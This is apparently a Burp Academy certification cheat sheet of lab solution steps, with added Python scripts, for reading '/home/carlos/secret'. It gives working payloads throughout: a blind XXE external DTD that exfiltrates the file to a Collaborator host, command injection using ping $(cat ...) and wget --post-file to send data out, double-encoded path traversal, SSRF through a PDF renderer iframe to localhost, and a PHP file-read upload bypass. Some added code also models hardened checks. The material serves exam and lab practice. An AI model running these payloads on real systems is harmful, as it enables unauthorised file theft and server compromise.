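        elif match.group("invalid") is not None:
            raise ValueError(f"malformed placeholder at offset {match.start()}")
    return names


def render_reset_email(template_text: str, username: str, reset_link: str) -> str:
    """Substitute placeholders only.

    Templates that reference anything outside ALLOWED_PLACEHOLDERS are refused
    instead of being looked up in the engine's environment, and substituted
    values are never expanded a second time, so a username of "$reset_link"
    stays a literal string.
    """
    unknown = placeholders_in(template_text) - ALLOWED_PLACEHOLDERS
    if unknown:
        raise ValueError(f"template references unsupported placeholder(s) {sorted(unknown)}")
    return Template(template_text).substitute(username=username, reset_link=reset_link)
```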

STAGE3.APP2 – XXE with external DTD to read “/home/carlos/secret” file

1. If there is a file upload (add users) with .xml file upload, this is the vector. If you follow all the
VA 19 12

steps properly and if this doesn’t work, move on to STAGE3.APP3 – XXE with command injection
to read “/home/carlos/secret” file vector.
VA 19 12

2. Create a .xml file with the following payload:


VA 19 12

<?xml version="1.0" encoding="UTF-8"?>


VA 19 12

<!DOCTYPE foo [
VA 19 12

<!ENTITY % xxe SYSTEM "https://your-exploit-server-id.security-


academy.net/exploit.dtd"> %xxe; ]>
VA 19 12

<users>
VA 19 12

<user>
<username>Example1</username>
VA 19 12

<email>[email protected]</email>
VA 19 12

</user>
<user>
VA 19 12

<username>&xxe;</username>
VA 19 12

<email>[email protected]</email>
</user>
VA 19 12

</users>
VA 19 12

3. Go to exploit server. Change the path to “exploit.dtd” and paste the following payload in the
VA 19 12

body and save it. Make sure to replace the Burp collaborator instance ID.
VA 19 12
VA 19 12

<!ENTITY % file SYSTEM "file:///home/carlos/secret">


<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://your-burp-
VA 19 12

collaborator-instance-id.net/?x=%file;'>">
VA 19 12

%eval;
%exfil;
VA 19 12
VA 19 12

4. Now upload the .xml file from step 2. You will receive a server error while trying to upload the
file but just ignore that.
VA 19 12

5. Poll your collaborator and note the solution in the GET request.
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12
VA 19 12

6. Submit the solution.


7. STAGE3 solved!
V 1 1

Sample lab from Burp Academy

https://portswigger.net/web-security/xxe/blind/lab-xxe-with-out-of-band-exfiltration
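Added example, not part of the original sheet: a small Python script that generates the two files used above (the uploaded users.xml and the hosted exploit.dtd) and recovers the leaked value from the request line Collaborator logs. The exploit-server and Collaborator host names are the same placeholders as on the page, the two user records and the sample request are constructed.

```python
"""Blind XXE with out-of-band exfiltration: build the uploaded document and the
hosted DTD, then recover the leaked value from the Collaborator HTTP request.

Added example for this cheat sheet, not the target application's code.
EXPLOIT_SERVER and COLLABORATOR are placeholders; replace them with your own.
"""
from urllib.parse import parse_qs, urlsplit

EXPLOIT_SERVER = "https://your-exploit-server-id.security-academy.net"  # placeholder
COLLABORATOR = "your-burp-collaborator-instance-id.net"                 # placeholder
TARGET_FILE = "/home/carlos/secret"


def build_exfil_dtd(collaborator_host: str, target_file: str) -> str:
    """The external DTD served as /exploit.dtd.

    %file holds the target file's contents. The replacement text of %eval
    declares a third parameter entity, %exfil, whose SYSTEM URL embeds %file.
    Inside an entity value every '%' must start a parameter-entity reference,
    so the '%' of the nested declaration is written as the character reference
    &#x25;, while %file; is expanded as the value is read. Parameter-entity
    references inside a markup declaration are only allowed in an external
    DTD, which is why this cannot sit in the uploaded file's internal subset.
    """
    exfil_url = f"http://{collaborator_host}/?x=%file;"
    return "\n".join([
        f'<!ENTITY % file SYSTEM "file://{target_file}">',
        f'<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM \'{exfil_url}\'>">',
        "%eval;",   # defines %exfil with the file contents in its URL
        "%exfil;",  # resolving it makes the parser request the Collaborator URL
        "",
    ])


def build_xxe_document(exploit_server: str) -> str:
    """The uploaded users.xml. %xxe; in the internal subset pulls in the hosted
    DTD; the exfiltration happens while the DOCTYPE is processed. The &xxe;
    reference in the body has no general-entity declaration (xxe is a parameter
    entity), one reason the upload itself ends in a server error."""
    return "\n".join([
        '<?xml version="1.0" encoding="UTF-8"?>',
        "<!DOCTYPE foo [",
        f'  <!ENTITY % xxe SYSTEM "{exploit_server}/exploit.dtd">',
        "  %xxe;",
        "]>",
        "<users>",
        "  <user><username>Example1</username><email>example1@example.com</email></user>",  # constructed
        "  <user><username>&xxe;</username><email>example2@example.com</email></user>",    # constructed
        "</users>",
        "",
    ])


def recover_secret_from_request(raw_request: str) -> str:
    """Pull the x= value out of the request Collaborator logged.
    parse_qs also undoes any percent-encoding the XML parser applied."""
    request_line = raw_request.splitlines()[0]
    _method, target, _version = request_line.split(" ", 2)
    values = parse_qs(urlsplit(target).query, keep_blank_values=True).get("x")
    if not values:
        raise ValueError("no x parameter in request line: " + request_line)
    return values[0]


if __name__ == "__main__":
    print("--- exploit.dtd ---")
    print(build_exfil_dtd(COLLABORATOR, TARGET_FILE))
    print("--- users.xml ---")
    print(build_xxe_document(EXPLOIT_SERVER))
    # Constructed sample of what Collaborator shows after polling:
    sample = "GET /?x=5k8d2m1n HTTP/1.1\r\nHost: " + COLLABORATOR + "\r\n\r\n"
    print("recovered:", recover_secret_from_request(sample))
```

The HTTP form of this channel only works for a value that is a single URL-safe token, as the lab's secret is; a file containing newlines, spaces or other URL-special characters breaks the SYSTEM URL and the request never leaves, so for such files the value has to be wrapped (for example with a PHP filter) or sent over a different protocol.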

STAGE3.APP3 – XXE with command injection to read “/home/carlos/secret” file

1. If there is a file upload (add users) that accepts a .xml file, and you have already tried STAGE3.APP2
– XXE with external DTD to read “/home/carlos/secret” file without success, this is the vector.

2. Create a .xml file with the following payload, replacing the Burp Collaborator instance ID with
your own. The & characters of the shell command are written as &amp; so the XML stays well-formed;
the application receives plain &.

<?xml version="1.0" encoding="UTF-8"?>
<users>
  <user>
    <username>Example1</username>
    <email>`0&amp;ping $(cat /home/carlos/secret).your-burp-collaborator-instance-id.net &amp;`</email>
  </user>
  <user>
    <username>&xxe;</username>
    <email>[email protected]</email>
  </user>
</users>

3. Upload the .xml file. You will receive a server error while trying to upload the file; ignore it.

4. Poll your Collaborator; the solution is the leftmost label of the name in the DNS interaction.

5. Submit the solution.



6. STAGE3 solved!

Sample lab from Burp Academy


https://portswigger.net/web-security/os-command-injection/lab-blind-out-of-band-data-exfiltration
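Added example, not part of the original sheet: the command-injection string carried inside the XML field above, built with proper XML escaping and checked against what the application's parser actually hands it, plus decoding of the DNS interaction it produces. The Collaborator host is the page's placeholder; the user record and the sample DNS query are constructed.

```python
"""OS command injection smuggled through an XML field, and decoding the DNS
interaction it produces. Added example for the sheet; the user record and
the Collaborator host are constructed placeholders, not the target's data."""
import re
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

COLLABORATOR = "your-burp-collaborator-instance-id.net"  # placeholder
TARGET_FILE = "/home/carlos/secret"
# One DNS label: 1-63 characters of letters, digits and '-', no '-' at either end.
LABEL_RE = re.compile(r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?")


def shell_payload(collaborator: str, target_file: str = TARGET_FILE) -> str:
    """The value the shell must see. The backticks make it a command
    substitution inside whatever command the application builds; '0&' runs a
    throwaway command in the background so that ping is parsed as a fresh
    command, and $(cat ...) becomes the leftmost label of the queried name."""
    return f"`0&ping $(cat {target_file}).{collaborator} &`"


def build_users_xml(email_value: str) -> str:
    """Wrap the payload in the upload format. escape() turns '&' into '&amp;'
    (and '<', '>' into references); without it the document is malformed and
    the parser rejects it before the application ever reads the field."""
    return "\n".join([
        '<?xml version="1.0" encoding="UTF-8"?>',
        "<users>",
        "  <user>",
        "    <username>Example1</username>",  # constructed
        f"    <email>{escape(email_value)}</email>",
        "  </user>",
        "</users>",
        "",
    ])


def email_as_received(users_xml: str) -> str:
    """What the application gets back from its XML parser: the raw payload."""
    return ET.fromstring(users_xml).find("./user/email").text


def recover_from_dns_query(qname: str, collaborator: str) -> str:
    """Strip the Collaborator zone from a logged query name, e.g.
    '8k3x9q.your-burp-collaborator-instance-id.net.' -> '8k3x9q'.
    Only the suffix is compared case-insensitively; the leaked label is
    returned exactly as the resolver sent it."""
    name = qname.rstrip(".")
    suffix = "." + collaborator
    if not name.lower().endswith(suffix.lower()):
        raise ValueError("query is not for our Collaborator zone: " + qname)
    return name[: -len(suffix)]


def fits_in_dns_label(value: str) -> bool:
    """Data can only travel this way if it is a legal DNS label: at most 63
    characters of letters, digits and hyphens. Anything else needs the HTTP
    route (see the wget --post-file vector later on this page)."""
    return LABEL_RE.fullmatch(value) is not None


if __name__ == "__main__":
    payload = shell_payload(COLLABORATOR)
    doc = build_users_xml(payload)
    print(doc)
    print("parser hands the app:", email_as_received(doc))
    # Constructed Collaborator DNS interaction:
    print("leaked:", recover_from_dns_query(
        "8k3x9q.your-burp-collaborator-instance-id.net.", COLLABORATOR))
```

DNS is case-insensitive and some resolvers rewrite the case of labels in flight, so a value whose letter case matters should be exfiltrated over HTTP instead.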

STAGE3.APP4 – LFI in image file path to read “/home/carlos/secret” file

1. If the Admin panel only shows images and there is no “Img-Size” parameter in the image URL, this is
the vector.

2. Append the following payload to the image URL to read the “/home/carlos/secret” file. The parameter
name may differ depending on the lab you get. The traversal sequences and the “s” of “secret” are
double URL-encoded (%252f decodes to %2f and then to /; %2573 decodes to %73 and then to s), so a
blocklist applied after the first decode sees neither ../ nor the word secret, while the application's
second decode restores both.

GET /admin/adminimg?imagefile=..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f/home/carlos/%2573ecret

3. In the response, locate the solution.



4. Submit the solution.



5. STAGE3 solved!

Sample lab from Burp Academy



https://portswigger.net/web-security/file-path-traversal/lab-superfluous-url-decode
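Added example, not part of the original sheet: a constructed model of the flawed handler (decode once, run a blocklist, decode again) next to a hardened resolver that decodes once, canonicalises and checks containment. The image root is an assumption; the payload is the one from the request above.

```python
"""Why the double-encoded traversal in the sheet works, and the check that
stops it. Added example; both handlers are a constructed model of the
behaviour, not the target application's code."""
import posixpath
from urllib.parse import unquote

IMAGE_ROOT = "/var/www/images"                          # assumed image directory
PAYLOAD = "..%252f" * 8 + "/home/carlos/%2573ecret"     # value from the sheet


def vulnerable_resolve(raw_param: str) -> str:
    """Model of the flawed handler: the framework URL-decodes the parameter
    once, a blocklist runs on that value, then the application decodes it
    *again* before building the filesystem path (the superfluous decode)."""
    once = unquote(raw_param)          # '..%2f..%2f.../home/carlos/%73ecret'
    if "../" in once or "secret" in once.lower():
        raise PermissionError("blocklist hit")
    twice = unquote(once)              # '../../.../home/carlos/secret'
    return posixpath.normpath(posixpath.join(IMAGE_ROOT, twice))


def hardened_resolve(raw_param: str) -> str:
    """Decode exactly once, canonicalise, then require the result to stay
    under IMAGE_ROOT. No blocklist: containment is the control, so encoding
    tricks only change which harmless name gets looked up."""
    once = unquote(raw_param)
    candidate = posixpath.normpath(posixpath.join(IMAGE_ROOT, once))
    if posixpath.commonpath([IMAGE_ROOT, candidate]) != IMAGE_ROOT:
        raise PermissionError("path escapes image root")
    return candidate


def is_refused(resolver, raw_param: str) -> bool:
    """True if the resolver rejects the parameter instead of returning a path."""
    try:
        resolver(raw_param)
    except PermissionError:
        return True
    return False


if __name__ == "__main__":
    plain = "../../../../../../../../home/carlos/secret"
    single = "..%2f" * 8 + "/home/carlos/secret"
    for name, value in [("plain", plain), ("single-encoded", single), ("double-encoded", PAYLOAD)]:
        vuln = "refused" if is_refused(vulnerable_resolve, value) else vulnerable_resolve(value)
        hard = "refused" if is_refused(hardened_resolve, value) else hardened_resolve(value)
        print(f"{name:15} vulnerable -> {vuln}")
        print(f"{'':15} hardened   -> {hard}")
```

The plain and single-encoded forms are caught by the blocklist, which is exactly why the payload on the page needs the second layer of encoding; against the hardened resolver the double-encoded value is just a directory literally named `..%2f..%2f...` inside the image root.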

STAGE3.APP5 – OS command injection to read “/home/carlos/secret” file

1. If the Admin panel only shows images and the image URL has an “Img-Size” parameter, this is
the vector.

2. Append the following payload to the image size parameter. The parameter name may differ
depending on the lab you get. Spaces are URL-encoded as %20 because the command travels in a URL
parameter; the backticks make the shell run wget, which POSTs the file contents to your Collaborator.

imagesize="`/usr/bin/wget%20--post-file%20/home/carlos/secret%20https://your-collaborator-instance-id.burpcollaborator.net/`"

3. Poll your collaborator and the solution should be in the body of a POST request.
4. Submit the solution.

5. STAGE3 solved!

STAGE3.APP6 – SSRF to read “/home/carlos/secret” file

1. If you see a PDF report download option in the Admin panel, this is the vector.

2. Download the report and intercept the request.



3. Modify the request body to the following payload and forward the request:

{"table-html":"<div><p>Report Heading</p><iframe src='http://localhost:6566/home/carlos/secret'></iframe></div>"}

4. Download the PDF and the solution will be in the report.



5. Submit the solution.



6. STAGE3 solved!
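Added example, not part of the original sheet: the report body above built with json.dumps so the quoting cannot go wrong, next to the renderer-side gate that should have refused it. The port and the table-html field are taken from the step above; the gate is a constructed model, not the target's code.

```python
"""SSRF through an HTML-to-PDF renderer: the request body from the sheet, and
the renderer-side check that should refuse it. Added example; the gate below
is a constructed model, not the target application's code."""
import ipaddress
import json
from html.parser import HTMLParser
from urllib.parse import urlsplit

INTERNAL_TARGET = "http://localhost:6566/home/carlos/secret"   # from the sheet
BLOCKED_HOSTS = {"localhost"}   # names that are wrong without any DNS lookup
FETCHING_TAGS = {"iframe", "frame", "img", "script", "link", "object", "embed"}


def report_body(url: str) -> str:
    """JSON body for the report endpoint. The renderer lays out this HTML and
    follows the iframe's src from *its* network position, not the user's."""
    html = f"<div><p>Report Heading</p><iframe src='{url}'></iframe></div>"
    return json.dumps({"table-html": html})


class FetchCollector(HTMLParser):
    """Records every URL the renderer would request while building the page."""

    def __init__(self):
        super().__init__()
        self.urls = []

    def handle_starttag(self, tag, attrs):
        if tag in FETCHING_TAGS:
            for name, value in attrs:
                if name in ("src", "href") and value:
                    self.urls.append(value)


def embedded_urls(html: str) -> list:
    collector = FetchCollector()
    collector.feed(html)
    collector.close()
    return collector.urls


def is_internal_target(url: str) -> bool:
    """True if a user-supplied document must not be allowed to fetch this URL.
    Non-HTTP schemes (file:, gopher:, ...) and loopback, private and link-local
    address literals are refused. Other hostnames pass this layer; a complete
    fix resolves them and re-checks the addresses at connect time, because a
    public name can be pointed at 127.0.0.1 (DNS rebinding)."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return True
    host = parts.hostname or ""
    if host in BLOCKED_HOSTS:
        return True
    try:
        return not ipaddress.ip_address(host).is_global
    except ValueError:
        return False   # not an IP literal; see docstring


def unsafe_fetches(body_json: str) -> list:
    """Gate for the report endpoint: the URLs in the submitted HTML that point
    inside. An empty list means the document may be rendered."""
    html = json.loads(body_json)["table-html"]
    return [u for u in embedded_urls(html) if is_internal_target(u)]


if __name__ == "__main__":
    body = report_body(INTERNAL_TARGET)
    print(body)
    print("refused URLs:", unsafe_fetches(body))
```

Filtering URLs in the HTML is only the first layer; the renderer itself should run with egress restricted to the hosts it legitimately needs, since CSS imports, redirects and JavaScript (where enabled) can produce fetches that no HTML scan sees.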

STAGE3.APP7 – File upload bypass to upload a .php file to read “/home/carlos/secret” file

1. If there is an image upload via URL in the admin panel, this is the vector.

2. Go to exploit server and create the exploit file with the following payload.

<?php echo file_get_contents('/home/carlos/secret'); ?>



3. Go to the file upload function, paste the exploit URL, click save and intercept the request.
4. In the intercepted request, append %3f%2f.jpg to the URL right after .php (so the value ends in
?/.jpg once decoded) and forward the request. The extension check sees .jpg, while the server-side
fetch treats ? as the start of the query string and retrieves /exploit.php. The file will be uploaded.

5. Go to the uploaded file (/exploit.php) and retrieve the solution.



6. Submit the solution.

7. STAGE3 solved!
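Added example, not part of the original sheet: a constructed model of why the %3f%2f.jpg suffix passes an extension check applied to the whole URL string, next to a check that looks at the file that will actually be stored. The exploit-server host is the page's placeholder; the checks are a model of the behaviour, not the target's code.

```python
"""Why 'exploit.php%3f%2f.jpg' gets past an extension check on upload-by-URL,
and a check that looks at the file that is actually stored. Added example;
the checks are a constructed model, not the target application's code, and
the exploit-server host is a placeholder."""
import posixpath
from urllib.parse import unquote, urlsplit

ALLOWED_EXTENSIONS = {".jpg", ".jpeg", ".png", ".gif"}
# The value typed into the intercepted request (placeholder host).
RAW_FORM_VALUE = "https://your-exploit-server-id.security-academy.net/exploit.php%3f%2f.jpg"
# After the form body is URL-decoded the application sees '...exploit.php?/.jpg'.
SUBMITTED_URL = unquote(RAW_FORM_VALUE)


def naive_accepts(url: str) -> bool:
    """Flawed check modelled on the bypass: it looks at the end of the URL
    string, so '?/.jpg' satisfies it although the path ends in .php."""
    return url.lower().endswith(tuple(ALLOWED_EXTENSIONS))


def fetched_path(url: str) -> str:
    """What the server-side HTTP client actually requests: the path component.
    The '?' starts the query string, so '/.jpg' never reaches the exploit
    server's path."""
    return urlsplit(url).path


def stored_filename(url: str) -> str:
    """Filename the upload handler derives from the URL: the decoded basename
    of the path, which is why the file lands on the target as exploit.php."""
    return posixpath.basename(unquote(urlsplit(url).path))


def safe_accepts(url: str) -> bool:
    """Check the extension of the file that will be stored, never the raw URL
    string. Dotfiles and empty names are refused as well. This is only the
    first gate: store uploads outside the web root or where the server does
    not execute scripts, and verify the content type by sniffing the bytes."""
    name = stored_filename(url)
    stem, ext = posixpath.splitext(name)
    return bool(stem) and ext.lower() in ALLOWED_EXTENSIONS


if __name__ == "__main__":
    print("application sees :", SUBMITTED_URL)
    print("naive check      :", "accept" if naive_accepts(SUBMITTED_URL) else "reject")
    print("server fetches   :", fetched_path(SUBMITTED_URL))
    print("stored as        :", stored_filename(SUBMITTED_URL))
    print("path-based check :", "accept" if safe_accepts(SUBMITTED_URL) else "reject")
```

The string-suffix check is wrong in both directions: it admits exploit.php?/.jpg and rejects a legitimate https://img.example.org/photo.JPG?size=large, whereas checking the decoded path basename gets both right.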

